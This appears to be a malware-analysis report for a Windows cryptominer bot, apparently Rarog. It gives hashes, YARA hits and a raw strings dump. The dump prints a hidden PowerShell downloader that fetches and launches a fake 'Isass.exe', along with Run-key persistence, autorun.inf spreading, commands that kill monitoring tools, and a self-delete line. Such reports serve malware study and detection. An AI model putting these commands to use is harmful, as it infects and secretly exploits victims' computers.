Sample details: 72b28b7ba9db706cdaf4b54971860cca

Hashes
MD5: 72b28b7ba9db706cdaf4b54971860cca
SHA1: 093f8e75cf96e57129e9d6500731e8af375a784a
SHA256: 2385ae0c295eb7f880ec799e782aa07821cfa19f6de586de094bf0c70425ccba
SSDEEP: 12288:3qA1lHUWbUwhKqtV7hygDY4HohcB7YLywc5YTkuuXLMTaO:9M0RBpygDFX5YLywDQ7v
Details
File Type: PE32
Yara Hits
YRP/VC8_Microsoft_Corporation | YRP/Obsidium_v10059_Final | YRP/Microsoft_Visual_Cpp_8 | YRP/IsPE32 | YRP/IsWindowsGUI | YRP/HasDebugData | YRP/HasRichSignature | YRP/powershell | YRP/maldoc_find_kernel32_base_method_1 | YRP/domain | YRP/contentis_base64 | YRP/System_Tools | YRP/Dropper_Strings | YRP/WMI_strings | YRP/Misc_Suspicious_Strings | YRP/DebuggerCheck__QueryInfo | YRP/anti_dbg | YRP/network_tcp_socket | YRP/spreading_file | YRP/win_registry | YRP/win_files_operation | YRP/BASE64_table | YRP/Str_Win32_Winsock2_Library | YRP/Str_Win32_Http_API
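Strings (printable strings extracted from the sample, reproduced verbatim; file names such as Isass.exe, winIogon.exe and SecurityHeaIthService.exe are spelled with a capital I in place of a lowercase l, so match them exactly as shown)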
		!This program cannot be run in DOS mode.
`.rdata
@.data
@.reloc
?RPQWj
WWWQh\
VVVVVVW
u0h@@@
D$ _^[
D$ _^[
D$$j@P
D$$j@P
D$ j@P
D$ j@P
9E$WWV
t,WW9}
QQSVWd
URPQQh
;t$,v-
UQPXY]Y[
YYhH#E
t#Vh\_E
u0jAXf;
u0jAXf;
u!hXcE
&sWj5X
ujhDcE
u7hDcE
PPPPPPPP
F4_^[]
Tt1jhZ;
Tt1jhZ;
^$+^8+
t	j-Xf
N2jx_f;
~$+~8+
t	j-Xf
N2jx_f;
~$+~8+
F2jgYf;
< t1<	t-
tyPVj@W
_tcPVj@
u#j,Xf;
aShX~E
>=upF8
Wj0XPS
SSSPSW
u-PSSW
SSVWh 
f9:t!V
QQSWj0j@
u	!FX@
u^9^\t/
VX9^`tT
;N\u\W
j	PjYV
u2Vj@h8
9C`u99C\t4
9C`u5Wj
PVSQSWV
PPPPPWS
PP9E u:PPVWP
(HXt9f
rr	jrZ
rr	jrZ
PPPPPPPP
SWhxnC
Wj4XPV
OHSSVSSW
A(;A,v
O,9O(vV
+A Vj$
+AHVj(
FT9~Xt0
@(;A(s
+A$tU3
G(9_Lu8
;Q u	;A
eSPPWh
FYY;w(|
FY;w(|
9V(~?j
V<;V8}	
YYF;w,|
G@WVPR
Q;FD~Z
4Q;FD~Z
C8;sx|
tWVWj>
9V(~?j
V<;V8}	
j,h(tF
tB;wPt
n;w0tc
E;w0tLj
5;{0t?
FP;FL~
Q;FD~R
t]VWj>
}:;2|6
9xdtUW
x(kP$4
kW$4k_(4
AHkO($
Q;FD~R
t]VWj>
FY;w(|
9V(~?j
V<;V8}	
O`j@SV
FY;w(|
Q;FD~R
FYY;w(|
FY;w(|
9V(~>j
V<;V8}	
9V(~Bj
V<;V8}	
Q;FD~R
FP;FL~
C,H_^u
tO9xp~J
u28C`t
v	N+D$
v	N+D$
bad allocation
bad array new length
unknown error
device or resource busy
invalid argument
no such process
not enough memory
operation not permitted
resource deadlock would occur
resource unavailable try again
address family not supported
address in use
address not available
already connected
argument list too long
argument out of domain
bad address
bad file descriptor
bad message
broken pipe
connection aborted
connection already in progress
connection refused
connection reset
cross device link
destination address required
directory not empty
executable format error
file exists
file too large
filename too long
function not supported
host unreachable
identifier removed
illegal byte sequence
inappropriate io control operation
interrupted
invalid seek
io error
is a directory
message size
network down
network reset
network unreachable
no buffer space
no child process
no link
no lock available
no message available
no message
no protocol option
no space on device
no stream resources
no such device or address
no such device
no such file or directory
not a directory
not a socket
not a stream
not connected
not supported
operation canceled
operation in progress
operation not supported
operation would block
owner dead
permission denied
protocol error
protocol not supported
read only file system
result out of range
state not recoverable
stream timeout
text file busy
timed out
too many files open in system
too many files open
too many links
too many symbolic link levels
value too large
wrong protocol type
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
InitializeCriticalSectionEx
InitOnceExecuteOnce
CreateEventExW
CreateSemaphoreW
CreateSemaphoreExW
CreateThreadpoolTimer
SetThreadpoolTimer
WaitForThreadpoolTimerCallbacks
CloseThreadpoolTimer
CreateThreadpoolWait
SetThreadpoolWait
CloseThreadpoolWait
FlushProcessWriteBuffers
FreeLibraryWhenCallbackReturns
GetCurrentProcessorNumber
CreateSymbolicLinkW
GetCurrentPackageId
GetTickCount64
GetFileInformationByHandleEx
SetFileInformationByHandle
GetSystemTimePreciseAsFileTime
InitializeConditionVariable
WakeConditionVariable
WakeAllConditionVariable
SleepConditionVariableCS
InitializeSRWLock
AcquireSRWLockExclusive
TryAcquireSRWLockExclusive
ReleaseSRWLockExclusive
SleepConditionVariableSRW
CreateThreadpoolWork
SubmitThreadpoolWork
CloseThreadpoolWork
CompareStringEx
GetLocaleInfoEx
LCMapStringEx
0123456789abcdefghijklmnopqrstuvwxyz
0123456789abcdefghijklmnopqrstuvwxyz
bad exception
__based(
__cdecl
__pascal
__stdcall
__thiscall
__fastcall
__vectorcall
__clrcall
__eabi
__ptr64
__restrict
__unaligned
restrict(
 delete
operator
`vftable'
`vbtable'
`vcall'
`typeof'
`local static guard'
`string'
`vbase destructor'
`vector deleting destructor'
`default constructor closure'
`scalar deleting destructor'
`vector constructor iterator'
`vector destructor iterator'
`vector vbase constructor iterator'
`virtual displacement map'
`eh vector constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`copy constructor closure'
`udt returning'
`local vftable'
`local vftable constructor closure'
 new[]
 delete[]
`omni callsig'
`placement delete closure'
`placement delete[] closure'
`managed vector constructor iterator'
`managed vector destructor iterator'
`eh vector copy constructor iterator'
`eh vector vbase copy constructor iterator'
`dynamic initializer for '
`dynamic atexit destructor for '
`vector copy constructor iterator'
`vector vbase copy constructor iterator'
`managed vector copy constructor iterator'
`local static thread guard'
operator "" 
operator co_await
 Type Descriptor'
 Base Class Descriptor at (
 Base Class Array'
 Class Hierarchy Descriptor'
 Complete Object Locator'
CorExitProcess
`h````
xpxxxx
`h`hhh
xwpwpp
(null)
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
[aOni*{
~ $s%r
@b;zO]
v2!L.2
AreFileApisANSI
EnumSystemLocalesEx
GetActiveWindow
GetDateFormatEx
GetLastActivePopup
GetProcessWindowStation
GetTimeFormatEx
GetUserDefaultLocaleName
GetUserObjectInformationW
IsValidLocaleName
LCIDToLocaleName
LocaleNameToLCID
MessageBoxA
MessageBoxW
RoInitialize
RoUninitialize
AppPolicyGetProcessTerminationMethod
AppPolicyGetThreadInitializationType
AppPolicyGetShowDeveloperDiagnostic
AppPolicyGetWindowingModel
Sunday
Monday
Tuesday
Wednesday
Thursday
Friday
Saturday
January
February
August
September
October
November
December
MM/dd/yy
dddd, MMMM dd, yyyy
HH:mm:ss
UTF-16LEUNICODE
NAN(SNAN)
nan(snan)
NAN(IND)
nan(ind)
_hypot
_nextafter
1#QNAN
1#SNAN
]vQ<)8
|)P!?Ua0
Eb2]A=
u?^p?o4
y1~?|"
?|I7Z#
>,'1D=
?g)([|X>=
:h"?bC
@H#?43
Ax#?uN}*
r7Yr7=
F0$?3=1
H`$?h|
&?~YK|
sU0&?W
<8bunz8
?#%X.y
F||<##
<@En[vP
?5Wg4p
"B <1=
pEvents
Lock already taken
SetThreadGroupAffinity
GetThreadGroupAffinity
GetCurrentProcessorNumberEx
GetLogicalProcessorInformationEx
pScheduler
version
eventObject
ppVirtualProcessorRoots
SchedulerKind
MaxConcurrency
MinConcurrency
TargetOversubscriptionFactor
LocalContextCacheSize
ContextStackSize
ContextPriority
SchedulingProtocol
DynamicProgressFeedback
WinRTInitialization
MaxPolicyElementKey
Mbp?333333
pContext
pExecutionResource
RegisterTraceGuidsW
UnregisterTraceGuids
TraceEvent
GetTraceLoggerHandle
GetTraceEnableLevel
GetTraceEnableFlags
pThreadProxy
switchState
Access violation - no RTTI data!
Bad dynamic_cast!
<8bunz8
l,kg<i
<@En[vP
invalid string position
string too long
Unknown exception
bad locale name
generic
iostream
iostream stream error
ios_base::badbit set
ios_base::failbit set
ios_base::eofbit set
invalid stoi argument
stoi argument out of range
YXBpLm9kbWVuYXJtaTl6LnNpdGU=
c3VjY2Vzcw==
C:\ProgramData\MicrosoftCorporation\Windows\Modules\
Instance
C:\ProgramData\MicrosoftCorporation\Windows\Modules
autorun.inf
autorun.exe
[Autorun]
open = autorun.exe
C:\ProgramData\{4FCEED6C-B7D9-405B-A844-C3DBF418BF87}\driver.dat
/2.0/method/info
minergate
stratum
cryptonight
monerohash
nicehash
dwarfpool
suprnova
nanopool
xmrpool
/2.0/method/checkConnection
profile=
/2.0/method/error
{EXE_NAME}
{EXE_PATH}
C:\ProgramData\WindowsAppCertification
WindowHelperStorageHostSystemThread.ps1
/2.0/method/update'
$furl = 'http://
C:\ProgramData\WindowsAppCertification\
$path = 'C:\ProgramData\MicrosoftCorporation\Windows\System32\'
$fpath = $path + 'Isass.exe'
$isfile = Test-Path $fpath 
if($isfile -eq 'True') {}
New-Item -ItemType directory -Path $path
$WebClient = New-Object System.Net.WebClient
$WebClient.DownloadFile($furl,$fpath)
Start-Process -FilePath $fpath}
C:\ProgramData\WindowsAppCertification\checker.vbs
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "C:\ProgramData\WindowsAppCertification\cert.cmd",0
C:\ProgramData\WindowsAppCertification\cert.cmd
@echo off
powershell -WindowStyle Hidden -ExecutionPolicy Bypass -NoP -file C:\ProgramData\WindowsAppCertification\WindowHelperStorageHostSystemThread.ps1
C:\ProgramData\MicrosoftCorporation\Windows\Helpers\SecurityHeaIthService.exe
C:\ProgramData\MicrosoftCorporation\Windows\Helpers\SystemldleProcess.exe
C:\ProgramData\MicrosoftCorporation\Windows\Helpers\winIogon.exe
C:\ProgramData\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8}
C:\ProgramData\{CB28D9D3-6B5D-4AFA-BA37-B4AFAABF70B8}\
/2.0/method/config
/4.0/method/cores
/4.0/method/blacklist
/2.0/method/delay
NetMonitor
Process Killer
KillProcess
System Explorer
Process Explorer
Process Hacker
{THREADS}
/c taskkill /im 
C:\ProgramData\MicrosoftCorporation\Windows\System32\_Isass.exe
Software\Microsoft\Windows\CurrentVersion\Run
Windows_Antimalware_Host_Syst
C:\ProgramData\{4FCEED6C-B7D9-405B-A844-C3DBF418BF87}
/c timeout 5 & taskkill /im Isass.exe /f & erase C:\ProgramData\MicrosoftCorporation\Windows\System32\Isass.exe & RMDIR /s/q "C:\ProgramData\MicrosoftCorporation" & exit
&build=
/2.0/method/setOnline
install
open_url
update
restart_bot
delete_bot
/c start 
&videocard=
&processor=
&platform=
&profile=
&hwid=
buildID=
/4.0/method/installSuccess
C:\ProgramData\MicrosoftCorporation\Windows\System32\Isass.exe
/4.0/method/check
/4.0/method/threads
/2.0/method/get
/4.0/method/modules
/5.1/method/installError
C:\ProgramData\MicrosoftCorporation
C:\ProgramData\MicrosoftCorporation\Windows
C:\ProgramData\MicrosoftCorporation\Windows\System32
Unknown
SELECT * FROM Win32_OperatingSystem
SELECT * FROM Win32_Processor
NtQueryInformationProcess
ntdll.dll
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
 & exit
 /f & erase 
RSDS<e
E:\_Rarog\Release\Rarog.pdb
.text$di
.text$mn
.text$x
.text$yd
.idata$5
.00cfg
.CRT$XCA
.CRT$XCAA
.CRT$XCC
.CRT$XCL
.CRT$XCU
.CRT$XCZ
.CRT$XIA
.CRT$XIAA
.CRT$XIAC
.CRT$XIC
.CRT$XIZ
.CRT$XPA
.CRT$XPB
.CRT$XPX
.CRT$XPXA
.CRT$XPZ
.CRT$XTA
.CRT$XTZ
.rdata
.rdata$r
.rdata$sxdata
.rdata$zzzdbg
.rtc$IAA
.rtc$IZZ
.rtc$TAA
.rtc$TZZ
.xdata$x
.idata$2
.idata$3
.idata$4
.idata$6
.data$r
.rsrc$01
.rsrc$02
CreateThread
WriteFile
CreateFileW
MultiByteToWideChar
GetLastError
CloseHandle
CreateDirectoryW
GetModuleFileNameA
TerminateProcess
GetModuleFileNameW
OpenProcess
SetFileAttributesW
GetLogicalDriveStringsW
CreateToolhelp32Snapshot
CopyFileA
Process32NextW
DeleteFileA
Process32FirstW
LoadLibraryW
SetFileAttributesA
SetCurrentDirectoryW
GetProcAddress
RemoveDirectoryA
GetCurrentProcessId
FreeLibrary
CopyFileW
CreateDirectoryA
GetDriveTypeW
GetCurrentProcess
GetSystemInfo
IsWow64Process
K32GetModuleFileNameExW
GetModuleHandleA
K32GetModuleBaseNameW
ReadProcessMemory
WideCharToMultiByte
K32EnumProcessModules
KERNEL32.dll
GetForegroundWindow
GetWindowTextA
MessageBoxW
EnumDisplayDevicesW
USER32.dll
RegDeleteValueA
RegOpenKeyExA
GetCurrentHwProfileW
SetKernelObjectSecurity
ConvertStringSecurityDescriptorToSecurityDescriptorW
RegOpenKeyExW
RegSetValueExA
RegCloseKey
ADVAPI32.dll
ShellExecuteW
SHFileOperationW
SHELL32.dll
CoUninitialize
CoCreateInstance
CoSetProxyBlanket
CoInitializeSecurity
CoInitializeEx
ole32.dll
OLEAUT32.dll
WS2_32.dll
WinHttpQueryDataAvailable
WinHttpConnect
WinHttpSendRequest
WinHttpCloseHandle
WinHttpOpenRequest
WinHttpReadData
WinHttpOpen
WinHttpReceiveResponse
WINHTTP.dll
UnhandledExceptionFilter
SetUnhandledExceptionFilter
IsProcessorFeaturePresent
IsDebuggerPresent
GetStartupInfoW
GetModuleHandleW
QueryPerformanceCounter
GetCurrentThreadId
GetSystemTimeAsFileTime
InitializeSListHead
EnterCriticalSection
LeaveCriticalSection
TryEnterCriticalSection
DeleteCriticalSection
DuplicateHandle
WaitForSingleObjectEx
GetCurrentThread
SetLastError
InitializeCriticalSectionAndSpinCount
CreateEventW
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
GetTickCount
EncodePointer
DecodePointer
LCMapStringW
GetLocaleInfoW
GetStringTypeW
GetCPInfo
LocalFree
RtlUnwind
RaiseException
InterlockedPushEntrySList
InterlockedFlushSList
LoadLibraryExW
ExitProcess
GetModuleHandleExW
GetStdHandle
GetFileType
WriteConsoleW
GetACP
HeapAlloc
HeapFree
ExitThread
FreeLibraryAndExitThread
HeapReAlloc
FlushFileBuffers
GetConsoleCP
GetConsoleMode
OutputDebugStringW
IsValidLocale
GetUserDefaultLCID
EnumSystemLocalesW
ReadFile
SetFilePointerEx
FindClose
FindFirstFileExA
FindNextFileA
IsValidCodePage
GetOEMCP
GetCommandLineA
GetCommandLineW
GetEnvironmentStringsW
FreeEnvironmentStringsW
GetProcessHeap
SetStdHandle
ReadConsoleW
HeapSize
SetEndOfFile
CreateTimerQueue
SetEvent
SignalObjectAndWait
SwitchToThread
SetThreadPriority
GetThreadPriority
GetLogicalProcessorInformation
CreateTimerQueueTimer
ChangeTimerQueueTimer
DeleteTimerQueueTimer
GetNumaHighestNodeNumber
GetProcessAffinityMask
SetThreadAffinityMask
RegisterWaitForSingleObject
UnregisterWait
GetThreadTimes
GetVersionExW
VirtualAlloc
VirtualProtect
VirtualFree
ReleaseSemaphore
InterlockedPopEntrySList
QueryDepthSList
UnregisterWaitEx
Copyright (c) by P.J. Plauger, licensed by Dinkumware, Ltd. ALL RIGHTS RESERVED.
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
                          
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
.?AVtype_info@@
.?AVbad_alloc@std@@
.?AVbad_array_new_length@std@@
.?AVinvalid_argument@std@@
.?AVlogic_error@std@@
.?AVlength_error@std@@
.?AVout_of_range@std@@
.?AVstl_condition_variable_interface@details@Concurrency@@
.?AVstl_condition_variable_vista@details@Concurrency@@
.?AVstl_condition_variable_win7@details@Concurrency@@
.?AVstl_condition_variable_concrt@details@Concurrency@@
.?AV_Locimp@locale@std@@
.?AVstl_critical_section_interface@details@Concurrency@@
.?AVstl_critical_section_vista@details@Concurrency@@
.?AVstl_critical_section_win7@details@Concurrency@@
.?AVstl_critical_section_concrt@details@Concurrency@@
.?AV_com_error@@
.?AVbad_exception@std@@
.?AVWaitBlock@details@Concurrency@@
.?AVSingleWaitBlock@details@Concurrency@@
.?AVMultiWaitBlock@details@Concurrency@@
.?AVWaitAllBlock@details@Concurrency@@
.?AVWaitAnyBlock@details@Concurrency@@
.?AVTimedSingleWaitBlock@details@Concurrency@@
.?AV?$_MallocaArrayHolder@PAVContext@Concurrency@@@details@Concurrency@@
.?AVimproper_lock@Concurrency@@
.?AVscheduler_resource_allocation_error@Concurrency@@
.?AVunsupported_os@Concurrency@@
.?AVinvalid_operation@Concurrency@@
.?AVResourceManager@details@Concurrency@@
.?AUIResourceManager@Concurrency@@
.?AUITopologyExecutionResource@Concurrency@@
.?AUITopologyNode@Concurrency@@
.?AUTopologyObject@GlobalCore@details@Concurrency@@
.?AUTopologyObject@GlobalNode@details@Concurrency@@
.?AVscheduler_worker_creation_error@Concurrency@@
.?AVimproper_scheduler_reference@Concurrency@@
.?AVimproper_scheduler_attach@Concurrency@@
.?AVScheduleGroupBase@details@Concurrency@@
.?AVScheduleGroup@Concurrency@@
.?AVCacheLocalScheduleGroup@details@Concurrency@@
.?AVFairScheduleGroup@details@Concurrency@@
.?AVSchedulerBase@details@Concurrency@@
.?AVScheduler@Concurrency@@
.?AU_Chore@details@Concurrency@@
.?AVRealizedChore@details@Concurrency@@
.?AVCacheLocalScheduleGroupSegment@details@Concurrency@@
.?AVScheduleGroupSegmentBase@details@Concurrency@@
.?AVFairScheduleGroupSegment@details@Concurrency@@
.?AVcontext_unblock_unbalanced@Concurrency@@
.?AVcontext_self_unblock@Concurrency@@
.?AVmissing_wait@Concurrency@@
.?AVinvalid_scheduler_policy_key@Concurrency@@
.?AVinvalid_scheduler_policy_value@Concurrency@@
.?AVinvalid_scheduler_policy_thread_specification@Concurrency@@
.?AVnested_scheduler_missing_detach@Concurrency@@
.?AVinvalid_oversubscribe_operation@Concurrency@@
.?AVContextBase@details@Concurrency@@
.?AVContext@Concurrency@@
.?AV_Interruption_exception@details@Concurrency@@
.?AV_RefCounter@details@Concurrency@@
.?AV_CancellationTokenRegistration@details@Concurrency@@
.?AVCancellationTokenRegistration_TaskProc@details@Concurrency@@
.?AV?$_MallocaArrayHolder@PAVevent@Concurrency@@@details@Concurrency@@
.?AVExecutionResource@details@Concurrency@@
.?AUIExecutionResource@Concurrency@@
.?AVSchedulerProxy@details@Concurrency@@
.?AUISchedulerProxy@Concurrency@@
.?AVFreeThreadProxy@details@Concurrency@@
.?AVThreadProxy@details@Concurrency@@
.?AUIThreadProxy@Concurrency@@
.?AUIThreadProxyFactory@details@Concurrency@@
.?AVFreeThreadProxyFactory@details@Concurrency@@
.?AV?$ThreadProxyFactory@VFreeThreadProxy@details@Concurrency@@@details@Concurrency@@
.?AVVirtualProcessor@details@Concurrency@@
.?AVInternalContextBase@details@Concurrency@@
.?AUIExecutionContext@Concurrency@@
.?AVExternalContextBase@details@Concurrency@@
.?AVThreadScheduler@details@Concurrency@@
.?AUIScheduler@Concurrency@@
.?AVThreadInternalContext@details@Concurrency@@
.?AVVirtualProcessorRoot@details@Concurrency@@
.?AUIVirtualProcessorRoot@Concurrency@@
.?AVFreeVirtualProcessorRoot@details@Concurrency@@
.?AVThreadVirtualProcessor@details@Concurrency@@
.?AV_Ref_count_base@std@@
.?AV?$_Ref_count_obj_alloc@V__ExceptionPtr@@U?$_StaticAllocator@H@@@std@@
.?AV?$_Ref_count_obj@V__ExceptionPtr@@@std@@
.?AV__non_rtti_object@std@@
.?AVbad_typeid@std@@
.?AVfailure@ios_base@std@@
.?AV?$basic_filebuf@DU?$char_traits@D@std@@@std@@
.?AVruntime_error@std@@
.?AV?$codecvt@DDU_Mbstatet@@@std@@
.?AVios_base@std@@
.?AVerror_category@std@@
.?AV?$ctype@D@std@@
.?AVsystem_error@std@@
.?AVcodecvt_base@std@@
.?AV_Facet_base@std@@
.?AV_Generic_error_category@std@@
.?AU_Crt_new_delete@std@@
.?AV?$_Iosb@H@std@@
.?AV?$basic_ofstream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_streambuf@DU?$char_traits@D@std@@@std@@
.?AV?$_LaunchPad@V?$unique_ptr@V?$tuple@P6AXXZ@std@@U?$default_delete@V?$tuple@P6AXXZ@std@@@2@@std@@@std@@
.?AV?$_LaunchPad@V?$unique_ptr@V?$tuple@P6AXV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@ZV12@@std@@U?$default_delete@V?$tuple@P6AXV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@ZV12@@std@@@2@@std@@@std@@
.?AV_Iostream_error_category@std@@
.?AVbad_cast@std@@
.?AUctype_base@std@@
.?AV?$basic_ios@DU?$char_traits@D@std@@@std@@
.?AVfacet@locale@std@@
.?AV_Pad@std@@
.?AV?$basic_ostream@DU?$char_traits@D@std@@@std@@
.?AV_System_error@std@@
.?AVexception@std@@
.?AV?$basic_stringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AV?$basic_ifstream@DU?$char_traits@D@std@@@std@@
.?AV?$basic_stringbuf@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@
.?AV?$basic_iostream@DU?$char_traits@D@std@@@std@@
.?AV?$numpunct@D@std@@
.?AV?$basic_istream@DU?$char_traits@D@std@@@std@@
.?AV?$num_put@DV?$ostreambuf_iterator@DU?$char_traits@D@std@@@std@@@std@@
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level='asInvoker' uiAccess='false' />
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>
0(040@0L0X0b0q0}0
1!1(1U1}1
=H=O=`=~=
=@?J?X?
2#222e2
<6=E=a=
0R1f1r1
373l3"4'4,4I4y4
9'9<9J9_9m9
:3:F:v:
:2;<;\;
;K<"=)=2=>=
>>?P?Z?e?
2<3C3U3h3
3x3O4T4
;,;C;I;P;V;];
;,<7>u>
>&?^?w?
2#2U2}2
4 4C4^4
666^6m6s6
697I7a7n7
;'<@<l=
>)?U?n?
12282B2a2t3H4j4~4
4	5-5Q5u5
282a2f2p2
3 3)3.3;3@3E3J3U3Z3_3d3n3s3{3
3'4,444N4d4
575A5y5
98:<:@:D:H:y:
;$;);.;;;@;`;|;
<==K=q=w=
1)1.191I1[1`1k1{1
5Q6V6`6
7 7)7.7P7T7X7\7`7v7
;Y<`<m<t<
8k8r8w8|8
:':N:o:
9J9P9V<c<x<
=$=F=e=
> >:>v>
8F8T8j8
:7;];~;
2&454d4j4}4
:&;5;V<e<&=8=1>
<$<D<\<e<k<
<%=A=X=
0-080`0i0:1`1p1{1
<8<a<z<
=@=P=[=
>F?X?}?
0>0C0H0P0W0j0
2I2y2f3s3
494L4c4
1:2X2s2
2J3O3h3p3v3{3
566H6_7
:E;M;v<
60E0j2v5
151<1B1G1U1
8?8E8K8Q8W8]8d8k8r8y8
9F9L9R9X9^9d9k9r9y9
;.;D;[;p;w;};
<+<3<L<
<8=c=x=}=
?*?G?Z?h?
"0+030o0
122J2P2
3.373D3\3
4A4F4y4
5+5J5j5
5^6h6r6
6B9J9Z9
9*:0:5:R:
; ;I;W;
= =2=G=L=y=
0P0\0c0
2'2:2G2X2x2
3	414]4
5[6b6i6p6}6
:%:+:1:6:<:B:H:M:S:Y:_:d:j:p:v:{:
;!;(;.;3;9;?;E;J;P;V;\;a;g;m;s;x;~;
<%<+<0<6<<<B<G<M<S<Y<^<d<j<p<u<{<
="=(=-=3=9=?=D=J=P=V=[=i=o=
>;>e>k>
?3?=?C?V?d?j?
090I0O0h0n0
1	1%1+1D1J1h1n1
2,2I2Z2`2f2m2z2
8,8K8n8
8&9>9C9
>&?k?p?t?x?|?
: :$:3:T:b:h:
;&;4;E;V;b;s;
949G9a9|9
:&:Y:c:u:~:
;A;M;R;W;~;
<"<.<U<a<~=
1#1*131v1
3V3h3p3z3
9H:M:T:x:
;.;=;K;W;c;q;
253L3J4
788X8@9Y:
8(8<8U8
	0!0N0i0y0~0
4,4t4x4
5#5)545:5H5f5
6"6.666N6s6
7<8P8l8
8(9A9F9O9
:8:C:M:\:d:l:\;
062<2N2Y2
9E:q:z:
<+=2===K=R=X=s=z=
575I5P5
5%6;6y6
8&8C8j8
9(989E9n9w9
:%:G:X:i:
0"1Y1k1
2,2D2w2
8/9L9k9
1)1.1a1m1u1
2#2(2-2=2B2G2W2\2a2q2v2{2
3#313=3I3]3s3
4/4C4N4S4X4u4
5#5H5S5X5]5z5
6C6N6S6X6s6}6
7)7E7P7U7Z7x7
8%8G8R8W8\8}8
:/:N:Y:d:i:n:
:];h;m;r;
<%<*</<I<N<S<o<
=.=D=Q=V=d=
0#1U1w1B2s3
7d9k9q9
< <s<x<}<
050S0q0
1B4]95<t<{<
1P5S6d6G8R8b8
<P=w=&>
?!?;?J?T?a?k?{?
0&082e2
3C3L3P3V3Z3`3d3n3
6$6)6r6
6d7k7u7
:+:H:P:y:
:0;7;@;j;};
<%<W<m<
=W=i={=
2/2A2S2
2S4Z4b4j4r4,859v9
k2?3u3
0B1G1s1{1
2'202;2C2a2m2
6D6h6q6|6
)0F0V0
2-252E2V2
7;7H7W7
<	=&=:=\=f=
;$<V<p<
669+:3:j:q:q=
4o7u7c;
0)1/141;1K1Y1j1
2\4x4R5
686C6P6b6
6G7\7e7n7
9*929O9_9k9z9e:
? ?%?+?=?E?V?^?g?x?
9+:8:m:z:)<E<U<u<
>Y>d>p>
2C3!464O4
5>5L5v5
6A6G6R6s6
7.7d7~7
9)979?9K9V9v9
:3:=:M:
:5;G;Z;h;m;
>	? ?5?S?b?x?
(040i0x0
6A7K7X7
819B9N9n9
9/:;:N:X:l:
:K;W;e;k;r;
>'>->E>
3)3/3K3h3
4!4I4c4
5"5.5F5L5V5i5
090?0o0!2
3 6<6^6v6
:@;s;!<@<
=!=/=5=	>C>
[0h0u0
181Q1k1y1
2A3H3S3a3u3
4/5R5u5
8P9]9n9
<.<8<E<O<Z<m<~<
5$6F6Q6n6t6
071>3c3<5C5N5Z5`5
888E8`8
8+9D9_9
=U>Z>a>o>
A0K0]0j0|0
6A7R7g7~7
7	8#8@8T8d8
:::o:{:
P0k0S4s4h6
8Q:k:w:
011>1J1
1l2x2E4:5G6v6\7x7
>$?(?,?0?4?8?<?@?D?H?z?
:(:1:N:b:
;8;o;~;
<7<Z<t<
<W=o=x=
0$0.0;0E0R0\0
1%1+1A1g1}1
3"3(393D3
3O4\4p4
<><M<[<H>
7D8_8z8
6&6V6i:{:
063C3g3~3
;0<9<W<b<k<
>2>B>H>N>Z>g>
797V7x7
:);P;n;{;7<r=
=+>8>`>
?+?<?J?a?g?
;7\7w7
9?96;;;M;k;
0070W0
536A6K6W6j6
6O7v7|7
0,161w1
1&2.262>2~2
2F394L4x4
586H6T6f6v6
8,9R9r9
9":o:#;};:<h=
9":B:l:
3'3J3z3
3-4H4z4
4(5C5f5
9*:E:h:
;';O;r;
<$=W=z=
?$?G?u?
1$121=1z1
3 3$3034383<3P3T3X3\3`3d3h3l3p3t3
4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4|4
4p5t5x5|5
9$9,949<9D9L9T9\9d9l9t9|9
:$:,:4:<:D:L:T:\:d:l:t:|:
0h4l4p4t4x4|4
8$8,848<8D8L8T8\8d8l8t8|8
9$9,949<9D9L9T9\9d9l9t9|9
:$:,:4:<:D:L:T:\:d:l:t:|:
;$;,;4;<;D;L;T;\;d;l;t;|;
<$<,<4<<<D<L<T<\<d<l<t<|<
=$=,=4=<=D=L=T=\=d=l=t=|=
>$>,>4><>D>L>T>\>d>l>t>|>
? ?(?0?8?@?H?P?X?`?h?p?x?
0 0(00080@0H0P0X0`0h0p0x0
1 1(10181@1H1P1X1`1h1p1x1
2 2(20282@2H2P2X2`2h2p2x2
3 3(30383@3H3P3X3`3h3p3x3
4 4(40484@4H4P4X4`4h4p4x4
5 5(50585@5H5P5X5`5h5p5x5
8 8$8(8,8084888<8@8D8H8L8P8T8X8\8`8d8h8l8p8t8x8|8
9 9$9(9,9094989<9@9D9H9L9P9T9X9\9`9d9h9
5 5$5(5,5054585<5D5H5L5P5T5X5\5`5l5t5|5
6 6$6(6,6064686<6@6D6H6L6P6T6
9 9$9(9,9
3 3$3(3,3034383<3@3D3H3L3P3T3X3\3`3d3h3l3p3t3x3|3
4 4$4(4,4044484<4@4D4H4L4P4T4X4\4`4d4h4l4p4t4x4
5$5,545<5D5L5T5\5d5l5t5|5
80D0P0\0h0t0
1(141@1L1X1d1p1|1
2$202<2H2T2`2l2x2
3 3,383H3T3`3l3x3
4 4,484D4P4
5D6L6T6\6d6l6t6|6
7$7,747<7D7L7T7\7d7l7t7|7
